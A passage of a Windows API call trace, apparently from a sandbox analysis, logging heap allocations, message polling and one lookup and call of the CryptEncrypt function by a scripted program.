lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.882] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0262.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0262.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.883] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.883] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0262.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0262.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.883] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0262.883] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0262.883] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.883] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0262.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0262.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.923] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0262.924] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0262.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0262.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.924] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0262.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.924] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0262.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0262.925] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0262.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51df0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0262.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0262.925] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0262.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0262.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e541e8 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0262.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0262.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0262.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0262.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0262.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0262.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0262.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0262.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0262.926] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x192, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x198) returned 1 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0270 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0262.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0262.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0262.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0262.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0262.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0262.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0262.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0262.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0262.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0262.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0262.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0262.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0262.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0262.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0262.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0262.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0262.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0262.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0262.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0262.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0262.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0262.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0262.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0262.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0262.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be01e8 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0262.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0262.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0270 | out: hHeap=0x970000) returned 1 [0262.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0262.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0262.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0262.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0262.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0262.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0262.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0262.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0262.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0262.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0262.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0262.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0262.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0262.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0262.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0262.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0262.933] CharLowerBuffW (in: lpsz="byte[408]", cchLength=0x9 | out: lpsz="byte[408]") returned 0x9 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0262.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0262.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0262.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x198) returned 0x3be01e8 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, 